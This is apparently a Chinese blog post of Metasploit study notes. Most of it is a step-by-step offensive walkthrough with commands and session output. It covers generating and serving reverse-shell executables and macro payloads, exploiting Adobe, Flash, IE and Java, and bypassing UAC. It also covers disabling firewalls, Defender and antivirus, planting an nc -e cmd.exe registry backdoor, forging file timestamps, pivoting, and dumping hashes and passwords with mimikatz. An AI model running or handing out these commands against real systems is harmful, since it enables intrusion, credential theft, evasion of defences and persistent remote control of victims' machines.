Payload size: 584 bytes
Final size of exe file: 73802 bytes
Saved as: 2.exe 2. root@kali:~# cp 2.exe /var/www/html/
//拷贝到网站目录下
3. root@kali:~# service apache2 start 4. windows上访问http://192.168.214.150/2.exe 5. window上执行 6. msf5 > use exploit/multi/handler //msf上使用这个模块 7. msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp//添加这个payload 8. msf5 exploit(multi/handler) > set lHOST 192.168.214.150//设置为本机地址,即shell反弹到我们的kali上 9. 获取到shell msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.214.150:4444
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.214.132
[*] Command shell session 1 opened (192.168.214.150:4444 -> 192.168.214.132:49524) at 2020-02-29 21:16:56 +0800 C:\Users\root\Desktop>ipconfig

利用Acrobat Reader漏洞执行payload:

msf5 > use exploit/windows/fileformat/adobeutilprintf

set payload windows/meterpreter/reverse
tcp

生成一个payload
切换到use exploit/multi/handler

使用payload:set payload windows/meterpreter/reversetc

使用post模块记录:run post/windows/capture/keylogrecoder

利用FLASH插件漏洞执行payload:use exploit/multi/browser/ adobe
flash
hackingteamvaf;use exploit/multi/browser/ adobe_flashopaquebackgrounduaf;use auxiliary/server/ browserautopwn2

利用IE浏览器漏洞执行payload:use exploitwindows/browser/ ms14
064
olecodeexcution

利用jre漏洞执行payload

use exploit/multi/browser/javajre17drivermanager

use exploit/multi/browser/javajre17jmxbean

use exploit/multi/browser/java
jre17reflectiontypes

生成android后门程序

use payload/android/meterpreter/reverse_tcp

VBScript感染方式

利用宏感染word,excel文档,绕过某些基于文件类型检查的安全机制,生成vvbscript脚本:msfvenom -a x86 --platform windows -p windows/meterpreter/reversetcp LHOST=192.168.214.150 LPORT=4444 -e x86/shikataganai -f vba-exe然后在office当中创建宏,MSF启动侦听:use exploit/multi/handler;set payload windows/meterpreter/reversetcp

metesploit后渗透测试阶段

已经获得目标系统控制权后扩大战果:

提权;信息搜集;渗透内网;永久后门

基于已有session扩大战果:msfvenom -a x86 --platform windows -p windows/meterpreter/reversetcp LHOST=192.168.214.150 LPORT=4444 -e x86/shikataga_nai -f exe -o 1.exe

进一步获取system权限

可以看到我们现在是没有system权限的,因为UAC 限制。

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > load priv
[-] The 'priv' extension has already been loaded.

绕过UAC限制方法1

1. 使用模块 use exploit/windows/local/ask //基于已有session情况下

2. set payload windows/meterpreter/reverse_tcp //设置payload

3. set lhost 192.168.214.150 //设置侦听

4. set filename qq.exe //设置执行的文件名称(具有一定欺骗性)

5. set session 1 //设置session

6. 此时我们获得的新的session已经经过了UAC允许的meterpreter的shell

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

绕过UAC限制方法2: 1. 使用模块 use exploit/windows/local/bypassuac 2. set session 1 3. set payload windows/meterpreter/reversetcp 4. set lhost 192.168.214.150 5. exploit 此时不会像方法1一样弹出请求而自动获得system。 绕过UAC限制方法3: 1. use exploit/windows/local/bypassuacinjection 2. set payload windows/meterpreter/reverse_tcp 3. set session 1 4. set lhost 192.168.214.150 5. exploit

利用漏洞提升权限
  1. msf5 > use exploit/windows/local/ms13053schlamperei
  2. msf5 > use exploit/windows/local/ms13081trackpopupmenu
  3. msf5 > use exploit/windows/local/ms12097ieregistrysymlink
  4. use exploit/windows/local/pprflattenrec
Psexec模块之PASSTHEHASH

获取了system权限后获得了账号和密码以及hash值我们可以使用以下模块 use exploit/windows/smb/psexec set smbpass hash 但我们需要提前关闭UAC,进入到操作系统然后修改注册表关闭UAC,否则无法登陆成功。

关闭防火墙
  • 需要管理员或system权限
  • 进入到powershell下执行:netsh advfirewall set allprofiles state on
关闭windefend
  • net stop windefend
Bitlocker磁盘加密
  • manage-bde -off C;
  • manage-bde -status C ;//查看状态
关闭DEP
  • bcdedit.exe /set {current} nx AlwaysOff
杀死防病毒软件

在meterpreter下执行:run killav run post/windows/manage/killav

开启远程桌面服务

在meterpreter下执行:run post/windows/manage/enable_rdp - run getgui -e - run getgui -u username -p pass

查看远程桌面
  • screenshot
  • use espia//加载插件
  • screengrab截屏
Tokens

用户每次登陆,账号绑定临时的token

访问资源时提交Token进行身份验证

- Delegate Tokem:交互登录会话

- impersonate Token:非交互登录会话

- Delegate Token账号注销后变为impersonate Token权限依然有效//这样我们可以获得管理员的token

Incognito

独立功能软件,被MSF集成在meterpreter中

无需密码破解或获取密码HASH,窃取token将自己伪装成其他用户

尤其适用于域环境下提权渗透多操作系统

load incognito

- listtokens -u //查看当前用户

- impersonate
token_lab\administrator

- 运行以上命令需要getsystem

- 本地普通权限用户需先本地提权

- use exploit/windows/loacl/ms10015kitrap0d
- execute -f cmd.exe -i -t //-t 使用当前假冒token执行程序

- shell //添加新用户net user a a /add

注册表

注册表保存着windows几乎全部配置参数

- 修改不当,可以直接造成系统崩溃

- 些改签完整备份注册表

- 某些注册表的修改是不可逆的

常见用途:修改,增加启动项

- 窃取存于注册表中的机密信息

- 绕过文件型病毒查杀

upload /usr/share/windows-binaries/nc.exe C:\windows\system32

reg enumkey -k //枚举当前注册表中内容

HKLM\software\microsoft\windows\currentversion\run

reg setval -k
HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe' //-v 插入的名字 -d:放入的指令数据 -e执行cmd ,-d 静默执行 ,-L 侦听端口,有人来连,就把cmd交出,断开后端口依然侦听

reg queryval -k

HKLM\software\microsoft\windows\currentversion\run -v nc //查询一下,验证子健是否被插入成功

打开防火墙端口&改变防火墙策略的(meterpreter)
  • execute -f cmd -i -H //-h隐蔽的方式,-i 弹出cmd
  • netsh firewall show opmode //查看防火墙状态
  • net frrewall add portopening TCP 444 "策略名" ENABLE ALL
  • 重启以执行nc策略shutdown -r -f -t 0
信息搜集

抓包(meterpreter):load sniffer;sniffer——interfaces;snifferstart2;snifferdump 1.cap;在内存中个缓冲区循环存储抓包,不写硬盘;只能过滤meterpreter流量;全程使用ssl/tls加密。

解码:use auxiliary/sniffer/psnuffle;set PCAPFILE 1.cap

文件搜集

搜索文件:search -f *.ini //搜索所有ini类型文件

破解弱口令

use post/windows/gather/hashdump ##需要system权限
run //结果保存在/tmp目录下
use auxiliary/analyze/jtrcrackfast
stat 1.txt;touch -d “5 days ago” 1.txt
对文件时间进行修改

root@kali:~# stat 3.txt
文件:3.txt
大小:37 块:8 IO 块:4096 普通文件
设备:801h/2049d Inode:1979841 硬链接:1
权限:(0644/-rw-r--r--) Uid:( 0/ root) Gid:( 0/ root)
最近访问:2020-02-28 16:37:50.186301464 +0800
最近更改:2020-02-28 16:37:36.594301326 +0800
最近改动:2020-02-28 16:37:36.594301326 +0800
创建时间:-
root@kali:~# touch -d "2 days ago" 3.txt
root@kali:~# stat 3.txt
文件:3.txt
大小:37 块:8 IO 块:4096 普通文件
设备:801h/2049d Inode:1979841 硬链接:1
权限:(0644/-rw-r--r--) Uid:( 0/ root) Gid:( 0/ root)
最近访问:2020-02-29 16:21:23.819854388 +0800
最近更改:2020-02-29 16:21:23.819854388 +0800
最近改动:2020-03-02 16:21:23.814019733 +0800
创建时间:-

MACE:MTF entry - MTF:NTFS文件系统的主文件分配表master file table,包含文件大量信息,更多信息可研究,文件系统取证分析技术。 - modified,accessed,created,entry modified时间都是可以修改的:timestomp -m/-a/-c/-e/-z "时间点" 文件名 - timestomp-z "month/days/year hour:min:sec" 文件名

pivoting跳板/支点/枢纽

利用已经控制的一台计算机作为入侵内网的跳板

在其让内网计算机看来访问全部来自于跳板机。

在国内很多时候我们是没有自己的外部ip的,一般我们的请求都会先返回哦给我们的外部设备然后再通过流量映射返回给我们内部网段。

1. msfconsole -p windows/meterpreter/reversetcp LHOST=外部防火墙ip地址 LPORT=4444外部端口 -a x86 --platform windows -b"\x00\xff" -e x86/shikataganai -f exe -o a.exe

2. kali上使用模块use exploit/multi/handler,set payload windows/meterpreter/reverse
tcp,set lhost 192.168.214.150//设置为msf本机,即kali上

3. 此时我们控制了内网机器win7,我们开始向xp发起攻击。

4. run autoroute -s 目标网段IP地址 //添加路由,基于这个session跳板,想要去这个网段就基于当前的session。

5. 扫描内网网段:use auxiliary/scanner/portscan/tcp ,扫描网段的139,445端口

6. 对内网机器发现后攻击,此时侦听地址为内网的win7地址,进行攻击,获取shell。

pivoting之端口转发portfwd

利用已经被控计算机,在kali与攻击目标之间实现端口转发

- portfwd add -L LIP//本地kali侦听ip -L LPORT -r RIP//远程的要攻击的机器 -p RPORT

- portfwd list/delete/flush

set exitonsession false

我们获得了shell后一般情况下想再获得一个session要重复exploit,但我们使用set exitonsession false就可以持续不断的进行侦听。

POST模块

发生在我们获得一台机器的控制权之后
run post/windows/gather/arpscanner RHOSTS=1.1.1.0/24 //内网进行arp方式的扫描

run post/windows/gather/chexkvm //发现是否是一台虚拟机

run post/windows/gather/credentials/credential
collector //身份验证信息

run post/windows/gather/enumapplication //查看安装软件信息

run post/windows/gather/enumsnmp //查看目标机器snmp相关配置

run post/windows/gather/enum
logged
onusers //当前登录哦用户

run post/windows/gather/env //了解当前系统变量环境信息

run post/multi/recon/local
exploit_suggester //检查本地提权的漏洞,从而进行提权

run post/windows/manage/deleteuser USERNAME=yuanfh //删除账号

run post/windows/gather/firefox
creds //获取火狐账号密码信息

migrate -n 指定文件名 //迁移到指定文件

自动迁移:在handler模块当中我们可以:set autorunscript migrate -N 文件名

set AutoRunScript post/windows/gather/dumplinks 收集当前用户信息,注意一定要在目标用户的进程下
这个时候我们可以使用Initialautorunscript模块自动运行脚本:

set Initialautorunscript migrate -n explorer.exe

set AutoRunScript post/windows/gather/dumplinks

自动执行meterpreter脚本,自动执行post模块

run hostsedit -e 1.1.1.1 www.baidu.com //情况dns的缓存修改目标机器的访问固定网站的ip

持久后门

利用漏洞取得的meterpreter shell运行在内存当中,重启就会失效。

重复exploit漏洞可能造成服务崩溃

持久后门保证漏洞修复后让可以远程控制

run metsvc -A

meterpreter > run metsvc -A  

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\root\AppData\Local\Temp\sLERVzBi...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.

直接连接会被拒绝

root@kali:~# nc 192.168.214.132 31337

Ncat: Connection reset by peer.

退回来使用模块:set payload windows/metsvcbindtcp

配置后使用exploit

持久后门2

run persistence

-X //meterpreter的agent程序在操作系统重启时继续连接

使用默认shell为反弹shell

-r 反弹连接ip即kali的ip

Server username: NT AUTHORITY\SYSTEM

meterpreter > run persistence -X -r 192.168.214.150 -p 4444 -i 5

//-i延迟几秒

此时当我们的win7靶机进行重启,当我们exploit后依然获得了shell

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.214.150:4444
[*] Sending stage (180291 bytes) to 192.168.214.132
[*] Meterpreter session 7 opened (192.168.214.150:4444 -> 192.168.214.132:49160) at 2020-03-03 16:40:51 +0800
msf之mimikatz

meterpreter > load mimikatz

meterpreter > help

meterpreter > msv 获取的是hash值

meterpreter > ssp 获取的是明文信息
meterpreter > wdigest 读取内存中存放的账号密码明文信息

meterpreter > kerberos

meterpreter > mimikatzcommand -f a:: 输入一个错误的模块,可以列出所有模块
meterpreter > mimikatz
command -f samdump:: 可以列出samdump的子命令

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatzcommand -f handle::list 列出应用进程

meterpreter > mimikatz
command -f service::list 列出服务

RFI远程文件包含
  • use exploit/unix/webapp/php_include
  • set RHOST 192.168.214.111
  • set PATH /dvwa/vulnerabilities/fi/
  • set PHPURI/?page=XXpathXX //此处就默认XXpathXX即可,这是默认的,msf会为我们分配一个地址
  • set HEADERS "Cookie"
  • set payload php/meterpreter/reverse_tcp
  • set lhost 1.1.1.1
  • exploit

msf学习笔记的更多相关文章

  1. Cobalt Strike学习笔记

    Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发.服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java ...

  2. js学习笔记:webpack基础入门(一)

    之前听说过webpack,今天想正式的接触一下,先跟着webpack的官方用户指南走: 在这里有: 如何安装webpack 如何使用webpack 如何使用loader 如何使用webpack的开发者 ...

  3. PHP-自定义模板-学习笔记

    1.  开始 这几天,看了李炎恢老师的<PHP第二季度视频>中的“章节7:创建TPL自定义模板”,做一个学习笔记,通过绘制架构图.UML类图和思维导图,来对加深理解. 2.  整体架构图 ...

  4. PHP-会员登录与注册例子解析-学习笔记

    1.开始 最近开始学习李炎恢老师的<PHP第二季度视频>中的“章节5:使用OOP注册会员”,做一个学习笔记,通过绘制基本页面流程和UML类图,来对加深理解. 2.基本页面流程 3.通过UM ...

  5. 2014年暑假c#学习笔记目录

    2014年暑假c#学习笔记 一.C#编程基础 1. c#编程基础之枚举 2. c#编程基础之函数可变参数 3. c#编程基础之字符串基础 4. c#编程基础之字符串函数 5.c#编程基础之ref.ou ...

  6. JAVA GUI编程学习笔记目录

    2014年暑假JAVA GUI编程学习笔记目录 1.JAVA之GUI编程概述 2.JAVA之GUI编程布局 3.JAVA之GUI编程Frame窗口 4.JAVA之GUI编程事件监听机制 5.JAVA之 ...

  7. seaJs学习笔记2 – seaJs组建库的使用

    原文地址:seaJs学习笔记2 – seaJs组建库的使用 我觉得学习新东西并不是会使用它就够了的,会使用仅仅代表你看懂了,理解了,二不代表你深入了,彻悟了它的精髓. 所以不断的学习将是源源不断. 最 ...

  8. CSS学习笔记

    CSS学习笔记 2016年12月15日整理 CSS基础 Chapter1 在console输入escape("宋体") ENTER 就会出现unicode编码 显示"%u ...

  9. HTML学习笔记

    HTML学习笔记 2016年12月15日整理 Chapter1 URL(scheme://host.domain:port/path/filename) scheme: 定义因特网服务的类型,常见的为 ...

随机推荐

  1. golang []byte 和 string相互转换

    原文链接:golang []byte和string相互转换 测试例子 package main import ( "fmt" ) func main() { str2 := &qu ...

  2. centos7 nginx yum 配置

    [nginx] name=nginx repo baseurl=http://nginx.org/packages/centos/7/$basearch/ gpgcheck= enabled=

  3. chrome浏览器截图

    1.F12 打开开发者工具台 2.ctrl + shift + p,弹出搜索框之后输入: full 3.选中Mobile-- Capture fullsize screenshot ,成功保存图片.

  4. 第六篇 Scrum冲刺博客

    一.会议图片 二.项目进展 成员 已完成情况 今日任务 冯荣新 购物车列表,购物车工具栏 博客撰写 陈泽佳 静态结构 自定义图片组件,提交功能 徐伟浩 协助前端获取数据 协助前端获取数据 谢佳余 未完 ...

  5. qt exe文件添加图标

    Qt 怎样生成带图标的exe(转载) 一.问题描述 当我们在 Windows 下用 VS 生成 exe 程序时,如果窗口程序指定了图标,那么生成的 exe 程序便是指定的图标模样. 但是,当使用 Qt ...

  6. 重温Java Web的技术细节

    目录 一.背景 二.请求与响应 2.1.Http请求 2.2.Http响应 三.ServletConfig 3.1 测试ServletConfig参数 四.ServletContext 4.1 测试S ...

  7. 组件 popup 设计和源码剖析

    前言 NutUI 是一套京东风格的移动端 Vue 组件库,生态系统覆盖面广,支持按需加载.主题定制.多语言等,功能强大.目前 40+ 京东项目正在使用,设计精美,风格统一.在开发组件库的过程中,Nut ...

  8. webpack打包初始入门教程

    Webpack 是一个前端资源加载/打包工具.它将根据模块的依赖关系进行静态分析,然后将这些模块按照指定的规则生成对应的静态资源. 从图中我们可以看出,Webpack 可以将多种静态资源 js.css ...

  9. 专项测试实战 | 如何测试 App 流畅度(基于 FPS 和丢帧率)

    本文为霍格沃兹测试学院学员学习笔记. FPS 和丢帧率可以在一定程度上作为 APP 流畅度的一项衡量标准,本文介绍利用 adb shell dumpsys gfxinfo 命令获取软件渲染加载过程的数 ...

  10. 最强 Java 书单推荐,附学习方法

    技术大佬用1w+字来告诉你该读什么书,循序渐进,并提供百度云盘下载地址.重要的是还有学习方法. 请肆无忌惮地点赞吧,微信搜索[沉默王二]关注这个在九朝古都洛阳苟且偷生的程序员.本文 GitHub gi ...